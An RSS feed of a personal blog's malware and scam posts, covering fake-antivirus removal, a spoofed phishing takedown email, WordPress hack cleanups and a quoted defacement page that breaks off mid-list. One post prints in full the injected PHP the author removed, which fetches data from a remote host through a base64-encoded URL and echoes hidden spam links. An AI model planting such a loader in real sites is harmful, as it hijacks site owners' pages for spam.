<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>andrewapeterson.com &#187; Evil Robots</title>
	<atom:link href="http://andrewapeterson.com/category/technology/evil-robots/feed/" rel="self" type="application/rss+xml" />
	<link>http://andrewapeterson.com</link>
	<description></description>
	<lastBuildDate>Tue, 20 Dec 2011 13:57:22 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>How To Remove Antimalware Go for free</title>
		<link>http://andrewapeterson.com/2011/05/how-to-remove-antimalware-go-for-free/</link>
		<comments>http://andrewapeterson.com/2011/05/how-to-remove-antimalware-go-for-free/#comments</comments>
		<pubDate>Fri, 06 May 2011 06:28:57 +0000</pubDate>
		<dc:creator>andrewapeterson</dc:creator>
				<category><![CDATA[Computer Problems and Fixes]]></category>
		<category><![CDATA[Evil Robots]]></category>
		<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://andrewapeterson.com/?p=2126</guid>
		<description><![CDATA[OK.  If you&#8217;re reading this you&#8217;re probably pretty frustrated already so let me offer my condolences and say that you&#8217;re probably really close to being out of the woods now that you&#8217;re here.  I just successfully removed this little bugger from an Windows XP machine, and it only took about 15 minutes. I found several [...]]]></description>
			<content:encoded><![CDATA[<p>OK.  If you&#8217;re reading this you&#8217;re probably pretty frustrated already so let me offer my condolences and say that you&#8217;re probably really close to being out of the woods now that you&#8217;re here.  I just successfully removed this little bugger from an Windows XP machine, and it only took about 15 minutes.</p>
<p>I found several sites explaining how to manually remove this malware by editing the windows registry but I intend to make the instructions a little more clear so you can do this with a little more confidence.</p>
<p>And keep in mind, if you&#8217;re not dealing with XP, my instructions might not work exactly.  But you can probably apply my clarification to the popular instructions to whatever iteration of those instructions you need to work with.</p>
<p>Here are the popular instructions (in this case from <a href="http://removeit.info/remove-antimalware-go-fake-antispyware/">removeit.info</a>), but <strong>please keep reading before trying to follow them</strong>.</p>
<p><strong>Remove AntiMalware GO files and folders:</strong><br />
%Temp%\[random]\[random].exe</p>
<p><strong>Remove AntiMalware GO registry entries:</strong><br />
HKEY_CURRENT_USER\Software\[random]<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “[random].exe”<br />
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter “Enabled” = “0?<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings “ProxyOverride” = “”</p>
<p><strong>Clarifications and Precautions:</strong></p>
<ol>
<li>You can screw things up by making a mistake editing your registry, but you can minimize the risk by making a backup of the registry first.  Google it.  Sorry, I can&#8217;t make a tutorial on this, partly because I&#8217;m writing this on a Mac.</li>
<li>There are no files that actually say &#8220;[random]&#8220;.  What they say is something like &#8220;vhrdtmn1d&#8221; &#8230;In other words, in each of these steps, you&#8217;re looking for a registry entry or file that has a random string of characters.</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://andrewapeterson.com/2011/05/how-to-remove-antimalware-go-for-free/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fake &#8216;Cease and Desist&#8217; Notice From consultingmag.com posing as moonaconsulting.com</title>
		<link>http://andrewapeterson.com/2010/04/fake-cease-and-desist-notice-from-moona-consulting/</link>
		<comments>http://andrewapeterson.com/2010/04/fake-cease-and-desist-notice-from-moona-consulting/#comments</comments>
		<pubDate>Mon, 26 Apr 2010 15:19:58 +0000</pubDate>
		<dc:creator>andrewapeterson</dc:creator>
				<category><![CDATA[Evil Robots]]></category>
		<category><![CDATA[Scam Email Mashups]]></category>
		<category><![CDATA[Spam and Scams]]></category>

		<guid isPermaLink="false">http://andrewapeterson.com/?p=1882</guid>
		<description><![CDATA[The following is an Email I got from Hanna Mae, mae@moonaconsulting.com.  It looks like a phishing scam to me.  It contains the following takedown notice. The picture is the face of Vivek Moona, who runs Moona Consulting in Amsterdam, according to LinkedIN.  I don&#8217;t know if they are legit or not. 2nd UPDATE: The folks [...]]]></description>
			<content:encoded><![CDATA[<p><em><strong>The following is an Email I got from Hanna Mae, mae@moonaconsulting.com.  It looks like a phishing scam to me.  It contains the following takedown notice. </strong><strong><span style="text-decoration: line-through;">The picture is the face of Vivek Moona, who runs Moona Consulting in Amsterdam, according to LinkedIN.  I don&#8217;t know if they are legit or not. </span></strong></em></p>
<p><strong>2nd UPDATE: The folks at Moona helped me to determine that the email header info shows:</strong></p>
<p><strong>Return-Path: &lt;mae.hannahdj@moonaconsulting.com&gt;</strong></p>
<p><strong>Received: from consultingmag.com (devel-si.lightedge.com [216.81.167.125])</strong></p>
<p><strong>This essentially proves that moonaconsulting.com is not the true sender of the email.</strong></p>
<p><em><strong>UDPATE: a few weeks after posting this, I got an email from the owner of the site this email claims to be from.  He says they had nothing to do with these phishing scam emails.  The message I got from him is at the bottom of this post.</strong></em></p>
<p>Subject: Contract terms have been breached.</p>
<p>8 April, 2010</p>
<p>Hello,</p>
<p>It has come to our attention that you are republishing original content from our website on your website.<br />
Your unauthorized use of original material from our website is in violation of copyrights owned by us.<br />
If you do not immediately remove the copyrighted material from your website, and notify us in writing<br />
that you have done so, we will have no choice but to pursue legal action against you.<br />
We require the copyrighted material to be removed and written notice given that such has been removed,<br />
by no later than May 1, 2010. Attached is a list of the copyrighted material that you are infriging on.<br />
It contains links to the copyrighted material that you are using.</p>
<p>Sincerely,</p>
<p>CASE ID: 7714338</p>
<p><strong>[Attached was a Word doc which says:]</strong></p>
<p>(double click to view)</p>
<p>embedded you will find the law suit documents that</p>
<p>we wish to present in court.</p>
<p>Thank you</p>
<p><strong>[It seems this is a phishing scam.  They want me to launch an embedded app or something.]</strong></p>
<p><strong>[now here's the response I got to this post from the site's owner.]</strong></p>
<p>&nbsp;</p>
<div id="_mcePaste">Dear Andrew,</div>
<div id="_mcePaste">This is Vivek Moona. I saw your post on http://andrewapeterson.com/2010/04/fake-cease-and-desist-notice-from-moona-consulting/</div>
<div id="_mcePaste">These emails are phishing emails and in no way are these people representing Moona Consulting. I am very sorry that these people have received the emails, but they were sent out by someone impersonating as an employee of Moona Consulting and with any modern email programs deviants can send out “@anyemaildomain” fake emails that do not originate from our domain/address.</div>
<div id="_mcePaste">We are reporting abuse to the appropriate authorities and meanwhile could you do us a favor and please update your post accordingly. Feel free to contact me regarding this.</div>
<div id="_mcePaste">Best Regards</div>
<div id="_mcePaste">Vivek Moona</div>
<div id="_mcePaste">Moona Consulting</div>
<div id="_mcePaste">T +31 (0)20 4715070 | F +31 (0)204715071 | M +31 (0)646150014</div>
<div id="_mcePaste">www.moonaconsulting.com</div>
<div id="_mcePaste">Moona Consulting B.V. is registered at the Amsterdam Chamber of Commerce (“Kamer van Koophandel”) under the number 34202305. Any information transmitted by means of this e-mail (and any of its attachments) is intended exclusively for the addressee or addressees and for those authorised by the addressee or addressees to read this message. Any use by a party other than the addressee or addressees is prohibited.</div>
<div><strong>[I wonder what authorities he is contacting.]</strong></div>
]]></content:encoded>
			<wfw:commentRss>http://andrewapeterson.com/2010/04/fake-cease-and-desist-notice-from-moona-consulting/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Hosting Providers: Check Yourself &#8211; WordPress is Mainstream</title>
		<link>http://andrewapeterson.com/2010/04/hosting-providers-check-yourself-wordpress-is-mainstream/</link>
		<comments>http://andrewapeterson.com/2010/04/hosting-providers-check-yourself-wordpress-is-mainstream/#comments</comments>
		<pubDate>Thu, 15 Apr 2010 03:23:27 +0000</pubDate>
		<dc:creator>andrewapeterson</dc:creator>
				<category><![CDATA[Computer Problems and Fixes]]></category>
		<category><![CDATA[Evil Robots]]></category>
		<category><![CDATA[Ideas, Observations, Opinions, Rants Etc]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://andrewapeterson.com/?p=1874</guid>
		<description><![CDATA[When I get asked for help with an attack on a WordPress site, it&#8217;s often on the same few hosting providers.  And when it&#8217;s not, it&#8217;s usually a small, local hosting provider.  When I have spoken to the staff of one of these hosting providers, about what seems to only occur in these few situations, [...]]]></description>
			<content:encoded><![CDATA[<p>When I get asked for help with an attack on a WordPress site, it&#8217;s often on the same few hosting providers.  And when it&#8217;s not, it&#8217;s usually a small, local hosting provider.  When I have spoken to the staff of one of these hosting providers, about what seems to only occur in these few situations, they never take responsibility for having oddball server settings. And it&#8217;s not uncommon for them to actually blame their customers for using WordPress in the first place!</p>
<p>Some of the more popular Hosting Providers that seem to have more trouble than others with WordPress malware attacks in the past two years (in my experience) are Network Solutions and IX Web Hosting. And in general, hosting providers that have a lot of issues with malware affecting WordPress sites either</p>
<ul>
<li>Have screwy server settings that tempt developers to take risks with file permissions, or</li>
<li>Have vulnerabilities that allow malware to sneak from one hosting account to another</li>
</ul>
<p>As for some of the local, ma &#8216;n&#8217; pa providers I&#8217;ve had problems with, I&#8217;m not going to hit them when they&#8217;re down by naming names.  But let me just say this: Buying local isn&#8217;t necessarily a good idea when it comes to hosting. It&#8217;s often the worst thing you can do.  You usually get crappy support, a high price, a non-standard product, and to make things even worse, you also often get a territorial &#8216;server guy&#8217; who wants to blame any technical problems on the customer and not take responsibility for anything.</p>
<p>I can imagine being a hosting provider and not wanting to change how I do things just because a few of my customers want to run some weird PHP software they found somewhere.  But WordPress is <a href="http://andrewapeterson.com/2009/09/wordpress-usage-202-million-worldwide-62-8-million-us/">hardly obscure</a> anymore. And although I could be wrong, it seems that the server settings required for a smooth, safe ride with WordPress are in line with &#8220;best practices&#8221; for hosting providers in general, since all the best and most popular hosting providers seem to run WordPress perfectly.</p>
<p>So in the &#8216;news,&#8217; I guess on April 12th, 2010, someone (<a href="http://forums.networksolutions.com/view-member-profile-u4718.html">rshinsec</a>) at Network Solutions <a href="http://wordpress.org/support/topic/387733">announced</a> that an attack on many of Network Solutions&#8217; customers&#8217; sites was actually caused by a &#8220;WordPress Vulnerability.&#8221; (Quote is actually from a WordPress.org page <a href="http://wordpress.org/support/topic/387733">HERE</a>, because according to the WordPress.org page, Network Solutions has since edited the announcement)&#8221;</p>
<blockquote><p>&#8220;Beginning last week a WordPress vulnerability has been the target of attacks on multiple WordPress websites on hosting platforms around the web. We have a blog post with additional details about the vulnerability and how to secure your WordPress site.&#8221;</p></blockquote>
<p>In fact, it was not a WordPress problem at all.  So in response to some of the inaccurate anti-worpress blogosphere chatter caused by Network Solutions passing the buck like this, <a href="http://en.wikipedia.org/wiki/Matt_Mullenweg">Matt Mullenweg</a>, founder of WordPress <a href="http://wordpress.org/development/2010/04/file-permissions/">posted</a> to the WordPress Development Blog, clearing some things up, as well as putting it like this:</p>
<blockquote><p>&#8220;Summary: A web host had a crappy server configuration that allowed people on the same box to read each others’ configuration files, and some members of the “security” press have tried to turn this into a “WordPress vulnerability” story.&#8221;</p></blockquote>
<p>Thank you Matt!  We the people that use and love WordPress need to stand up for ourselves and demand what we deserve.  We are not a fringe community anymore.  WordPress is mainstream software and any hosting provider that has issues with it needs to check themselves!</p>
]]></content:encoded>
			<wfw:commentRss>http://andrewapeterson.com/2010/04/hosting-providers-check-yourself-wordpress-is-mainstream/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>wordpress attack inserts movie links in content</title>
		<link>http://andrewapeterson.com/2009/11/wordpress-attack-inserts-movie-links-in-content/</link>
		<comments>http://andrewapeterson.com/2009/11/wordpress-attack-inserts-movie-links-in-content/#comments</comments>
		<pubDate>Tue, 03 Nov 2009 06:37:02 +0000</pubDate>
		<dc:creator>andrewapeterson</dc:creator>
				<category><![CDATA[Computer Problems and Fixes]]></category>
		<category><![CDATA[Evil Robots]]></category>
		<category><![CDATA[Humanity, Culture, Philosophy, Politics, Ethics Etc]]></category>
		<category><![CDATA[Marketing/Advertising In The Cloud]]></category>
		<category><![CDATA[SEO, SEM, SMO Etc]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://andrewapeterson.com/?p=1842</guid>
		<description><![CDATA[One of my favorite clients&#8217; sites running WordPress was recently attacked by a bug that inserts links to &#8220;movie downloads&#8221; and &#8220;DVDs&#8221; all over the place in her content with &#8220;display:hidden&#8221; The site links to sites who are also under attack and when the bug is running correctly on those sites, the sites redirect the [...]]]></description>
			<content:encoded><![CDATA[<div>One of my favorite clients&#8217; sites running WordPress was recently attacked by a bug that inserts links to &#8220;movie downloads&#8221; and &#8220;DVDs&#8221; all over the place in her content with &#8220;display:hidden&#8221;</div>
<p>The site links to sites who are also under attack and when the bug is running correctly on those sites, the sites redirect the hits to the final destination,</p>
<p>which is http://www.zml.com/</p>
<p>I don&#8217;t know if zml.com knows this is happening.  I mean I suppose it&#8217;s possible that some unscrupulous SEO or Marketing guy promised them traffic and then resorted to this to get it.  I&#8217;m contacting them now to inform them of this uncool practice being committed on their behalf, and if they are not willing to cooperate on putting an end to it, I will have no choice but to give them some negative attention.</p>
<p>The process of extracting the bad links from the content was long and hard since the strings of code inserted were very inconsistent.</p>
<p>The following is a list of the sites being linked thru, which I assume are all victims of this malware.  If you own one of these sites, feel free to drop me a line and I will point you in the right direction as far as putting an end to this.</p>
<ul>
<li>http://blog.segd.org</li>
<li>http://www.investorsunited.com</li>
<li>http://www.oca-gla.org</li>
<li>http://www.thunderstruck.org</li>
<li>http://subway.com</li>
<li>http://verdadeabsoluta.net</li>
<li>http://yourrnc.com</li>
<li>http://wordpressthemesbox.com</li>
<li>http://mp3db.org</li>
<li>http://webconsultingdc.com</li>
<li>http://turtlesurvival.org</li>
<li>http://turtleconservationfund.org</li>
<li>http://truenorthbrass.com</li>
<li>http://tarabooks.com</li>
<li>http://kolenalaila.com</li>
<li>http://techbostonacademy.org</li>
<li>http://pie-flex.com</li>
<li>http://www.philebrity.tv</li>
<li>http://www.landmarkwine.com</li>
<li>http://artsinbushwick.org</li>
<li>http://brettmartin.org</li>
<li>http://bsf.org</li>
<li>http://www.popandpolitics.com</li>
<li>http://womanhonorthyself.com</li>
<li>http://www.brainstorm9.com</li>
<li>http://webdev.entheosweb.com</li>
<li>http://www.topicus-healthcare.com</li>
<li>http://www.vfilings.com</li>
<li>http://constantinessword.com</li>
<li>http://www.dopiska.com</li>
<li>http://writingcenters.org</li>
<li>http://www.radisson.com</li>
<li>http://notjustaprettyface.org</li>
<li>http://www.arizonacriminaldefenseblog.com</li>
<li>http://www.sembrarpaz.com</li>
<li>http://www.apostilla.com</li>
<li>http://www.geektechs.net</li>
<li>http://johnquiggin.com</li>
<li>http://blog.pdma.org</li>
<li>http://bluesheaven.com</li>
</ul>
<p>Message to ZML:</p>
<blockquote><p>Hello,</p>
<p>I am a developer and recently one of my clients who is running WordPress for her personal website was attacked by some Malware that inserted thousands of links throughout her content.  Those links resolve to your site, but via redirects thru other sites that I assume are also victims of the malware.</p>
<p>You look like you&#8217;ve built a pretty nice site here.  And I&#8217;m writing to give you the chance to get on board with fixing this problem before I am forced to create some negative attention in the blogosphere and social media.</p>
<p>It doesn&#8217;t seem like you would want to be resposible for malware.  But it also doesn&#8217;t seem like anyone would go through the trouble to make all these links back to you unless you were paying them.  Perhaps you hired some marketing or SEO people and were not aware that they would be using these tactics?    Please write back soon as I have very little patience for this kind of thing.</p>
<p>Thanks,</p>
<p>Andrew A. Peterson</p></blockquote>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 1209px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">&lt;wp:tag&gt;&lt;wp:tag_slug&gt;%d0%b0%d0%b2%d1%82%d0%be%d1%80%d1%81%d0%ba%d0%b8%d0%b5-%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d1%8b&lt;/wp:tag_slug&gt;&lt;wp:tag_name&gt;&lt;![CDATA[????????? ?????????]]&gt;&lt;/wp:tag_name&gt;&lt;/wp:tag&gt;</div>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 1209px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;"><span style="white-space: pre;"> </span>&lt;wp:tag&gt;&lt;wp:tag_slug&gt;%d1%81%d0%b2%d0%be%d0%b1%d0%be%d0%b4%d0%bd%d1%8b%d0%b9-%d0%bc%d0%b8%d0%ba%d1%80%d0%be%d1%84%d0%be%d0%bd&lt;/wp:tag_slug&gt;&lt;wp:tag_name&gt;&lt;![CDATA[????????? ????????]]&gt;&lt;/wp:tag_name&gt;&lt;/wp:tag&gt;</div>
<p>Some samples of weird code that the bot inserted:</p>
<p>&lt;wp:tag&gt;&lt;wp:tag_slug&gt;%d0%b0%d0%b2%d1%82%d0%be%d1%80%d1%81%d0%ba%d0%b8%d0%b5-%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d1%8b&lt;/wp:tag_slug&gt;&lt;wp:tag_name&gt;&lt;![CDATA[????????? ?????????]]&gt;&lt;/wp:tag_name&gt;&lt;/wp:tag&gt;</p>
<p><span style="white-space: pre;"> </span>&lt;wp:tag&gt;&lt;wp:tag_slug&gt;%d1%81%d0%b2%d0%be%d0%b1%d0%be%d0%b4%d0%bd%d1%8b%d0%b9-%d0%bc%d0%b8%d0%ba%d1%80%d0%be%d1%84%d0%be%d0%bd&lt;/wp:tag_slug&gt;&lt;wp:tag_name&gt;&lt;![CDATA[????????? ????????]]&gt;&lt;/wp:tag_name&gt;&lt;/wp:tag&gt;</p>
]]></content:encoded>
			<wfw:commentRss>http://andrewapeterson.com/2009/11/wordpress-attack-inserts-movie-links-in-content/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>wp_remote_fopen WordPress Attack Makes Site SLOW</title>
		<link>http://andrewapeterson.com/2009/06/wp_remote_fopen-wordpress-attack-makes-site-slow/</link>
		<comments>http://andrewapeterson.com/2009/06/wp_remote_fopen-wordpress-attack-makes-site-slow/#comments</comments>
		<pubDate>Thu, 18 Jun 2009 00:29:23 +0000</pubDate>
		<dc:creator>andrewapeterson</dc:creator>
				<category><![CDATA[Computer Problems and Fixes]]></category>
		<category><![CDATA[Evil Robots]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://andrewapeterson.com/2009/06/wp_remote_fopen-wordpress-attack-makes-site-slow/</guid>
		<description><![CDATA[Thanks to SomewwhereVille for helping me diagnose&#8230; Here&#8217;s what I removed from header.php (in all the installed themes, not just the active one):   &#60;?php /* wp_remote_fopen procedure */ $wp_remote_fopen=&#8217;aHR0cDovL3F3ZXRyby5jb20vc3Mv&#8217;; $opt_id=&#8217;62f751b6518fcbe2ab5980b9f1349902&#8242;; $blarr=get_option(&#8216;cache_vars&#8217;); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.&#8217;.md5&#8242;))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.&#8217;.txt&#8217;)); update_option(&#8216;cache_vars&#8217;,$blarr); } $blarr=unserialize(base64_decode(get_option(&#8216;cache_vars&#8217;))); if($blarr['hide_text']!=&#8221; &#38;&#38; sizeof($blarr['links'])&#62;0){ if($blarr['random']){ $new=&#8221;; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=&#8221;; foreach($blarr['links'] as $k=&#62;$v) $txt_out.=&#8217;&#60;a href=&#8221;&#8216;.$v.&#8217;&#8221;&#62;&#8217;.$k.&#8217;&#60;/a&#62;&#8217;; echo str_replace(&#8216;[LINKS]&#8216;,$txt_out,$blarr['hide_text']); [...]]]></description>
			<content:encoded><![CDATA[<p>Thanks to <a href="http://www.somewhereville.com/?p=695">SomewwhereVille</a> for helping me diagnose&#8230; Here&#8217;s what I removed from header.php (in all the installed themes, not just the active one):</p>
<blockquote><p> </p>
<p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica;">&lt;?php /* wp_remote_fopen procedure */ $wp_remote_fopen=&#8217;aHR0cDovL3F3ZXRyby5jb20vc3Mv&#8217;; $opt_id=&#8217;62f751b6518fcbe2ab5980b9f1349902&#8242;; $blarr=get_option(&#8216;cache_vars&#8217;); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.&#8217;.md5&#8242;))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.&#8217;.txt&#8217;)); update_option(&#8216;cache_vars&#8217;,$blarr); } $blarr=unserialize(base64_decode(get_option(&#8216;cache_vars&#8217;))); if($blarr['hide_text']!=&#8221; &amp;&amp; sizeof($blarr['links'])&gt;0){ if($blarr['random']){ $new=&#8221;; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=&#8221;; foreach($blarr['links'] as $k=&gt;$v) $txt_out.=&#8217;&lt;a href=&#8221;&#8216;.$v.&#8217;&#8221;&gt;&#8217;.$k.&#8217;&lt;/a&gt;&#8217;; echo str_replace(&#8216;[LINKS]&#8216;,$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ?&gt;</p>
</blockquote>
<p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica;">After removing this crap, I recommend installing <a href="http://wordpress.org/extend/plugins/wp-security-scan/">WP Security Scan</a>. It&#8217;s a pretty badass little plugin that walks you through doing some not-so-obvious things to protect WP from attacks.  For instance, if your hosting scenario allows, you can rename all your Database Tables to have a Prefix other than &#8220;wp_&#8221;</p>
<p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica;">Who knew that was the thing to do?  I didn&#8217;t.  It also scans your WP install for risky file permissions and weak passwords and a few other things.</p>
<p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica;"> </p>
<p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica;">Unfortunately for me, I was working on a site hosted by AN Hosting which doesn&#8217;t allow a certain priviledges to DataBase users (Alter?), so I had to change our table prefixes manually.</p>
<p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica;"> </p>
<p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica;">WP Security Scan, after failing to rename the table prefixes because it didn&#8217;t have sufficient access, referred me to a nice little <a href="http://semperfiwebdesign.com/documentation/wp-security-scan/change-wordpress-database-table-name-prefix/">tutorial on how to do it manually</a>. </p>
<p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica;"> </p>
<p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica;">Basically you:</p>
<ol>
<li>download your database thru PHPMyAdmin as per WordPress.org&#8217;s <a href="http://codex.wordpress.org/Backing_Up_Your_Database">Documentation</a>, </li>
<li>do a &#8220;Find-And-Replace&#8221; replacing all instances of &#8220;wp_&#8221; with &#8220;somethingelse_&#8221; </li>
<li>make a new database and import your &#8220;somethingelse_&#8221; version to the new database.</li>
<li>Change your wp-config.php file to point at the new database </li>
<li>Change your wp-config.php file&#8217;s &#8220;table prefix&#8221; line from &#8220;<strong>$table_prefix  = &#8216;wp_&#8217;</strong> &#8221; to &#8220;<strong>$table_prefix  = &#8216;somethingelse_&#8217;</strong>&#8220;</li>
</ol>
<p>These kinds of problems suck to have but it sure is nice to have the WordPress Community, all of us working together to combat the evil.</p>
]]></content:encoded>
			<wfw:commentRss>http://andrewapeterson.com/2009/06/wp_remote_fopen-wordpress-attack-makes-site-slow/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Safari Warning: &#8220;Suspected Malware Site&#8221; &#8230;WTF?</title>
		<link>http://andrewapeterson.com/2009/01/safari-warning-suspected-malware-site-wtf/</link>
		<comments>http://andrewapeterson.com/2009/01/safari-warning-suspected-malware-site-wtf/#comments</comments>
		<pubDate>Fri, 30 Jan 2009 06:30:47 +0000</pubDate>
		<dc:creator>andrewapeterson</dc:creator>
				<category><![CDATA[Computer Problems and Fixes]]></category>
		<category><![CDATA[Evil Robots]]></category>
		<category><![CDATA[Ideas, Observations, Opinions, Rants Etc]]></category>
		<category><![CDATA[Spam and Scams]]></category>
		<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://andrewapeterson.com/?p=1626</guid>
		<description><![CDATA[I was glancing at something over at The Pirate Bay and maybe I clicked on a banner or something but damn&#8230; What is this?  I&#8217;ve never seen anything like this on a Mac.  Is this new?  Are there new threats for Macs?  Or just new Warnings? ]]></description>
			<content:encoded><![CDATA[<p>I was glancing at something over at <a href="http://thepiratebay.org/">The Pirate Bay</a> and maybe I clicked on a banner or something but damn&#8230; What is this?  I&#8217;ve never seen anything like this on a Mac.  Is this new?  Are there new threats for Macs?  Or just new Warnings? </p>
<p><img class="alignnone size-full wp-image-1625" title="picture-17" src="http://andrewapeterson.com/wp-content/uploads/2009/01/picture-17.png" alt="picture-17" width="428" height="308" /></p>
<p><img class="alignnone size-full wp-image-1627" title="picture-18" src="http://andrewapeterson.com/wp-content/uploads/2009/01/picture-18.png" alt="picture-18" width="438" height="170" /></p>
]]></content:encoded>
			<wfw:commentRss>http://andrewapeterson.com/2009/01/safari-warning-suspected-malware-site-wtf/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>&#8220;Hacked By GUARD_FB&#8221; WordPress Dashboard Attack</title>
		<link>http://andrewapeterson.com/2008/12/hacked-by-guard_fb-wordpress-dashboard-attack/</link>
		<comments>http://andrewapeterson.com/2008/12/hacked-by-guard_fb-wordpress-dashboard-attack/#comments</comments>
		<pubDate>Thu, 11 Dec 2008 20:19:48 +0000</pubDate>
		<dc:creator>andrewapeterson</dc:creator>
				<category><![CDATA[Computer Problems and Fixes]]></category>
		<category><![CDATA[Evil Robots]]></category>
		<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://andrewapeterson.com/?p=1585</guid>
		<description><![CDATA[This attack on older versions of WordPress installs a file called index.html in the wp-admin directory so that when a user logs into their dashboard, the browser loads it rather than the index.php file that comes with WordPress.  The result is when trying to access the WordPress Dashboard, instead you get a page which says [...]]]></description>
			<content:encoded><![CDATA[<p>This attack on older versions of WordPress installs a file called index.html in the wp-admin directory so that when a user logs into their dashboard, the browser loads it rather than the index.php file that comes with WordPress.  The result is when trying to access the WordPress Dashboard, instead you get a page which says &#8220;Hacked By Guard_FB&#8221; followed by a graphic of a silhouette of a man with his with his fist in the air which reads &#8220;THE TURK PROTEST&#8230;&#8221;</p>
<p> </p>
<div id="attachment_1586" class="wp-caption alignnone" style="width: 360px"><a href="http://andrewapeterson.com/wp-content/uploads/2008/12/picture-48.png"><img class="size-full wp-image-1586 " title="wordpress hacked by guard fb" src="http://andrewapeterson.com/wp-content/uploads/2008/12/picture-48.png" alt="Appears in place of the Dashboard in WordPress" width="350" height="627" /></a><p class="wp-caption-text">Appears in place of the Dashboard in WordPress</p></div>
<p> </p>
<p> </p>
<p>The page then goes on with some left wing political stuff, and claims to be affiliated with a site called ateskes.org and is signed &#8220;King Defacer&#8221;</p>
<p>I&#8217;d rather see hacking going on for the sake of activism than for worthless spam, but this thing sucks. The blog on which I encountered this was not particularly political and so I suspect that the makers of this attack aren&#8217;t picking and choosing who they attack, which makes it evil crap.   </p>
<p>Bottom line, keep WordPress up to date, stay on top of your comment moderation, and use <a href="http://codex.wordpress.org/Editing_wp-config.php#Security_keys">WordPress&#8217; Cookie-Encryption &#8220;Security Keys&#8221; feature in your wp-config file</a>.</p>
<p>If this has happened to you, I recommend deleting your spam/comments in moderation (if there&#8217;s too many, <a href="http://wordpress.org/support/topic/176407">check here</a>), <a href="http://codex.wordpress.org/Upgrading_WordPress">upgrading WordPress</a>, then changing your Dashboard passwords. Of course, also <strong>delete the file called index.html</strong> in your wordpress directory&#8217;s wp-admin folder.</p>
<p>Full text of &#8220;Hacked By Guard_FB&#8221; Dashboard page is as follows:</p>
<blockquote><p> </p>
<p align="center"><strong>Hacked By GUARD_FB</strong></p>
<p align="center"> </p>
<p align="center"><strong></strong></p>
<p align="center"><img class="alignnone size-thumbnail wp-image-1586" title="wordpress hacked by guard fb" src="http://andrewapeterson.com/wp-content/uploads/2008/12/picture-48-150x150.png" alt="" width="150" height="150" /></p>
<p align="center"><span style="font-family: 'Courier New'; color: #ff0000; font-size: medium;"><strong>Ateskes.Org</strong></span></p>
<p><span id="htmlContent"><strong></strong></span></p>
<p><strong></strong></p>
<p><strong></strong></p>
<p><strong></p>
<div>
<table id="table1" style="height: 778px;" border="0" cellspacing="0" cellpadding="0" width="59%" bordercolor="#111111">
<tbody>
<tr>
<td width="79%" height="30" align="left">
<p align="center"><span style="font-size: x-small;"><strong>We Accuse:</strong></span></p>
</td>
</tr>
<tr>
<td width="79%" height="133" align="left">
<ul>
<li><span style="font-size: x-small;"><strong>G.W. Bush, T. Blair, and E. Olmert, the chief executives of the imperialist, colonialist, belligerent policies and actions of the US-British-Israeli coalition,</strong></span></li>
<li><strong><span style="font-size: x-small;">of perpetrating the composite crimes of war of annihilation, occupation, and the premeditated mass murder of children and civilians in Palestine and Lebanon,</span></strong></li>
